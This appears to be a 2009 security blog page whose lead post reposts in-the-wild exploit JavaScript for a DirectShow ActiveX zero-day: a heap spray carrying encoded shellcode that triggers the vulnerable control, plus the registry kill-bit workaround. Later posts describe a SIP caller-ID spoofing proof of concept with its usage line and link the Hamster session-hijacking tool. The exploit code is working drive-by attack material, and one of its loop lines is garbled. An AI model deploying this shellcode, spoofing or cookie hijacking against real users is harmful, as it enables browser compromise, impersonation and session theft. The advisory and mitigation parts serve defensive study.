Tuesday, July 7, 2009

DirectShow 0day in the wild

DirectShow 0day is a high rate of 0day exploit, the current outbreak has already begun last week online. In order for the attack to work the victim needs to use XP built-in Windows Media Player to play media files which in turn triggers internal loopholes.

This is a client side (IE) exploit, so visiting a malicious site will result in infection.

Attack characteristics are as follows:
(I`ve found the code on http://**.****.cn website)

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
"%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
"%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
"%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
"%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
"%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
"%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
"%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
"%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
"%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
"%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
"%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
"%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
"%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
"%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
"%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
"%u6363%u5251%u634c%u5553%u4550");
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.lengthomybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Microsoft's advisory offers workarounds for the issue (from today), including setting the killbit for the ActiveX control.

There is one known hotfix and that is to set a "kill bit" in the registry for the ActiveX component.

\x1 Create the following Key

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

\x2 Create a dword value named "Compatibility Flags" and give it a value of 400.



Posted by Jacky Altal at 12:42 AM 0 comments

Saturday, June 27, 2009

Let it sn0w

The iPod/iPhone 3G jailbreak is out. The iphone-dev team just released the 24kpwn LLB patch to allow for a persistent jailbreak. The team had been hanging on to this patch because there was the possibility the exploit could be used on future iPhone versions. Unfortunately, a group started selling the code, so the team was forced to release it for free. There is a tutorial available for updating a factory reset iPod/iPhone (backup link).

That means the same sort of technique can be used with the current redsn0w tool to jailbreak and unlock the iPhone 3GS.

Let it ultrasn0w....
Posted by Jacky Altal at 12:20 AM 0 comments

Wednesday, June 17, 2009

Infosec 2009

Open world, Open standards, Open source...
Infosec2009

Going to be very interesting ;)
Posted by Jacky Altal at 1:20 AM 0 comments

Tuesday, May 26, 2009

[Sum]mation ILHack

Good morning All! First, I would like to thank Yaniv Miron for organizing such a great conference and inviting me to speak about VoIP Tactics && Exploitaion at ILHack 2009.

Next, this one goes to all of my Students/Friends/Colleages thanks for the BIG support. You are all in my local subnet ;)

Special 10x to SIPM4ST3R yossef cohen for the lab organization, coding, and talking about the SIP Protocol as a part of the lecture.

The presentation, video of the lecture and source code for(SIPy and sip00fer) will be available --> ILHack download section during this weekend.



Hope to see you all, soon.

Jacky Altal
Posted by Jacky Altal at 2:34 AM 0 comments

Wednesday, May 20, 2009

Posted by Jacky Altal at 4:25 AM 0 comments

Saturday, May 9, 2009

sip00fer

After a looong week, i`ve finished my case study on PBX (Asterisk). A new 1.6.1.0 Asterisk version was installed on CentOS, a great disto. and by the help of the SIP M4ST3R Yossef{at}maxxvoice{dot}com I managed to \install\ AND \configure\ my new PBX up&&running in few hours. [./configure; make; make install] simple as that.

Then, I started testing my Asterisk box, as i saw a sample code that can create a fake call to any extension on metasploit framework. The code didn`t work on against a new 1.6.0.5 as Yossef found that the CSeq var is missing so i decided to implement it by my self, i used RFC3261 to deeply understand the protocol and to expend my research to this fascinating area.

I wrote a POC code in python and then convert it to C++ the POC will build a fake packet and send it to sip client.

The code will be posted soon -> ilHack 2009 <- along with a new SIPcliFuzzer.

Usage: sip00fer [host] [port] [fake_extension] [Fake_Caller]
Example: sip00fer 13.37.7.1 31317 101 jackjack

Posted by Jacky Altal at 11:02 PM 0 comments

Monday, April 27, 2009

Sidejacking

Hamster is a tool for HTTP session hijacking with passive sniffing. It eavesdrops on a network, captures the session cookies, then imports them into the browser to allow you to hijack their session.

Download Link
Posted by Jacky Altal at 10:37 PM 0 comments
Subscribe to: Posts (Atom)